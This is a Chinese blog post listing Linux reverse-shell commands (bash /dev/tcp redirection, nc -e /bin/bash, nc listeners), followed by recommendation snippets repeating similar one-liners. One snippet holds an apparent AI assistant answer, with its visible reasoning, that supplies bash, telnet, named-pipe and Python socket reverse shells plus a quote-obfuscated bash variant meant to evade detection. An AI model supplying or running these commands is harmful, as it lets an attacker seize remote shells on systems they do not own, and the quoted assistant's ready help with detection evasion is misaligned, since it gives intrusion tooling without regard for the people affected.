linux反弹shell常用指令

oneynhongx

已于 2024-01-07 03:18:29 修改

阅读量437

点赞数 8

CC 4.0 BY-SA版权

文章标签： linux 服务器网络

于 2024-01-06 05:03:30 首次发布

本文链接：https://blog.youkuaiyun.com/a1_pha/article/details/135421011

1 bash

bash -i >& /dev/tcp/主机地址/主机端口 0>&1

2 nc

nc -e /bin/bash 主机地址 主机端口

netstat监听端口

netstat -an | grep 端口号

nc监听端口

nc -lvvp 端口号

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

oneynhongx

关注关注

8
点赞
踩
10

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Linux反弹Shell的多种技巧

安心写bug的博客

08-10

1305

反弹Shell（Reverse Shell）主要用来实现反向连接，突破防火墙限制、权限不足、端口限制、动态IP、内网NAT等情况，这些限制使得传统的正向连接（如SSH、Telnet等）难以实现。

WEB安全基础 - - -Linux反弹shell

weixin_67503304的博客

08-23

3310

详细讲解Linux反弹shell包含的NC正向shell，NC反向shell，bash反弹shell，无e参数反弹shell，Base64编码绕过，Telnet反弹shell，OpenSSL反弹443端口，流量加密传输

参与评论您还未登录，请先登录后发表或查看评论

Linux下NC反弹shell命令（推荐）

09-15

主要介绍了Linux下NC反弹shell命令，非常不错，具有参考借鉴价值，需要的的朋友参考下吧

Linux常用的反弹shell命令

m0_63200360的博客

04-24

3937

什么是反弹shell？反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell？通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例：假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。

干货分享—Linux之渗透测试常用反弹shell方法总结！黑客技术零基础入门到精通实战教程！

最新发布

白帽阿叁的博客

05-07

684

反弹shell主要就是让我们能远程连接到目标控制台并且下达指令,来达到操控目标资产的目的!正向反弹: 控制端(也就是我们自己的机器)发送请求去连接被控端(目标机器)的方式。不过这种方式会受到防火墙,路由,等各种很多因素影响,很难成功。反向反弹: 被控端主动发送请求连接我们的控制端。这种方法是可以想办法避开防火墙和路由的一些限制的!我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程，需要的小伙伴可以扫描下方二维码或链接免费领取~

Linux反弹Shell

m0_73199983的博客

03-06

1614

被控端主动发起连接请求连接控制，通常被控制端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收送过来的数据包。被控端bash -i>&/dev/tcp/192.168.81.154(控制端IP)/6666 (控制端想要开放的端口号)0>&1bash -i打开一个交互式的bash shell。>&或者&>>&、&>：混合输出（正确、错误的输出都输出到一个地方），将标准输出、错误输出全都重定向到 /dev/tcp/HOST/PORT，即控制端如果不想用>&或者。

Linux 反弹 Shell

sankgao 的博客

01-12

787

Linux 反弹 Shell

Linux系统下反弹shell

若有战，召必回

11-30

3238

之前研究过一段时间的反弹shell，所以本文是我个人对反弹shell的理解，当然，本人才疏学浅，如有啥错的地方，各位师傅指出，共同学习一起进步！！！0x00 定义受害者由于某种原因主动向攻击者发起连接，攻击者可向受害者下发命令并得到命令执行结果，即为反弹shell。某种原因，包括但不限于受害机器运行了远控木马（钓鱼邮件附件），存在RCE漏洞等0x01 本质网络通信+命令执行+重定向方式。

linux反弹shell的原理详解

01-08

反弹shell命令： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell： nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...

linux反弹shell检测和溯源,Wazuh联动osquery检测linux反弹shell

weixin_39820136的博客

05-14

1264

用osquery根据制定的规则定时检测系统并生成包含查询结果的日志文件，wazuh再对这些日志文件进行解析之后匹配规则告警。osquery下载安装的过程就略过了。这里简单介绍下osquery，详细请参考官方文档文件结构/etc/osquery//usr/share/osquery/osquery.example.conf/usr/share/osquery/lenses/{*}.aug/usr/s...

不一样的视角剖析Linux 反弹shell水印版.pdf

08-02

【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识，作者从独特的角度出发，挑战了传统的分类方法，为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术，它涉及被控端...

Linux下反弹shell

渗透之路，攻防之间皆学问

04-21

4418

在渗透过程中，目标处于内网环境，或因为端口限制而我们无法直连目标机器，此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell，以便继续深入。记录几个常用的。

Linux反弹shell

weixin_64338385的博客

11-26

2413

0x01. bash 反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。在攻击主机上执行端口监听： nc -lvvp port //port 为攻击主机端口在目标主机上执行： bash -i >& /dev/tcp/攻击主机i...

【Linux环境下的shell反弹】

qq_55213436的博客

07-05

2179

在日常的渗透测试中，当我们拿到一个目标网站的漏洞的时候，往往可以采用shell反弹的方式来进行下一步的操作。反弹shell，就是攻击机监听在某个TCP/UDP端口为服务端，目标机主动发起请求到攻击机监听的端口，并将其命令行的输入输出转到攻击机。一般的shell反弹可以结合命令执行漏洞来实现。......

linux反弹shell方法

weixin_53747497的博客

07-12

2411

被控端主动发起连接请求去连接控制端，通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i ：打开一个交互式的bash shell/dev/tcp/IP/PORT ： /dev/tcp/是Linux中的一个特殊设备文件（Linux一切皆文件），实际这个文件是不存在的，它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出，为了确保命令执行后的输入被正确的传回攻击机。

LINUX shell反弹篇（一）

胖虎的博客

10-26

2241

linux 之shell反弹的方法及原理

linux 渗透反弹shell,【技术分享】Linux渗透之反弹Shell命令解析

weixin_26814683的博客

05-13

295

前言当我们在渗透Linux主机时，反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”，会出现一大堆相关文章，但是其内容不但雷同，而且都仅仅是告诉我们执行这个命令就可以反弹shell了，却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普，那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。Bash这篇文章的起因就是网上给的Ba...

【安全知识】——LInux的shell反弹姿势合集（更新中）

Demo不是emo的博客

05-17

6674

当我们拿到一台LINUX主机的权限时，往往都需要反弹到公网的服务器上，一般我们使用bash来反弹的情况居多，但是bash也有失灵的时候。在这种情况下，我们可以尝试使用其他的反弹语句来达到我们的目的。

Linux下反弹shell的种种方式

weixin_30423977的博客

04-06

202

[前言：在乌云社区看到反弹shell的几种姿势，看过之余自己还收集了一些，动手试了下，仅供参考] 0x01 Bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 这里shell由bash解析，有时候是由sh解析，不一定百发百中***在虚拟机里面试过可行，替换成自己的地址和端口即可******/dev/[tcp|upd]/h...

linux反弹shell命令

03-25

<think>好的，用户需要查找Linux反弹Shell的命令示例。首先，我需要回忆一下反弹Shell的基本概念，它通常用于让目标机器主动连接攻击者的机器，以便绕过防火墙或NAT的限制。根据提供的引用内容，有几个不同的方法可以实现这一点。首先，引用[5]提到使用Bash内置的/dev/tcp功能，命令是`bash -i >& /dev/tcp/攻击主机IP/端口 0>&1`。这是一个常见的方法，但需要目标系统的Bash支持这个特性。可能用户需要更详细的解释，比如如何替换IP和端口，或者为什么需要0>&1的部分。接下来，引用[2]中有使用Telnet的示例，比如`telnet 攻击主机IP 2333 | /bin/bash | telnet 攻击主机IP 4000`。这里可能需要解释管道的作用，以及如何设置监听端口。此外，引用[4]提到了使用mknod创建命名管道的方法，结合重定向，可能用户需要了解这种方法的步骤和原理。另外，引用[3]和[1]讨论了绕过限制的方法，比如使用不同的解释器或符号变形。虽然用户主要询问示例，但可能需要提醒用户注意这些变体，以应对不同的环境限制。需要注意，提供的引用中有多个不同的技术，需要将它们整理成清晰的示例，并说明每个命令的组成部分和用途。比如，Bash的方法、Telnet的方法、Python脚本的方法等。同时，需要强调这些命令中的IP和端口需要替换为实际的攻击者机器信息，并且说明攻击者需要提前在相应端口上启动监听。此外，可能用户对反弹Shell的工作原理不太清楚，所以简要解释每个命令背后的机制是有帮助的。例如，解释输入输出重定向如何建立双向通信，或者命名管道如何促进进程间通信。最后，确保回答的结构清晰，分点列出不同的方法，每个方法包含命令示例和简要说明，并引用对应的引用来源。同时，生成的相关问题应覆盖反弹Shell的原理、检测方法、使用场景和安全建议等方面。</think>以下是几种常见的Linux反弹Shell命令示例及其原理说明： ### 1. Bash内置TCP连接 ```bash bash -i >& /dev/tcp/攻击主机IP/端口 0>&1 ``` - **原理**：利用Bash的`/dev/tcp`虚拟设备建立TCP连接，将标准输入/输出重定向到网络套接字[^5]。 - **要求**：目标系统Bash需支持该特性（默认未禁用时可用）。 ### 2. Telnet双向管道 ```bash telnet 攻击主机IP 2333 | /bin/bash | telnet 攻击主机IP 4000 ``` - **原理**：通过两个Telnet连接分别传输命令（2333端口）和接收结果（4000端口），形成双向通信[^2]。 ### 3. 命名管道结合重定向 ```bash mknod a p; 0<a | /bin/bash 1>a ``` - **步骤分解**： 1. `mknod a p` 创建命名管道`a` 2. `0<a` 将输入重定向到管道 3. `/bin/bash 1>a` 将Bash输出重定向到管道，形成循环[^4] ### 4. Python实现 ```python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击主机IP",端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' ``` - **原理**：通过Python的`socket`模块建立TCP连接，重定向标准输入/输出/错误流[^2]。 ### 5. 符号变形绕过检测 ```bash b''a''sh -i >& /dev/tcp/x.x.x.x/443 0>&1 ``` - **特点**：通过插入单引号干扰字符串检测规则，实际仍执行Bash命令[^3]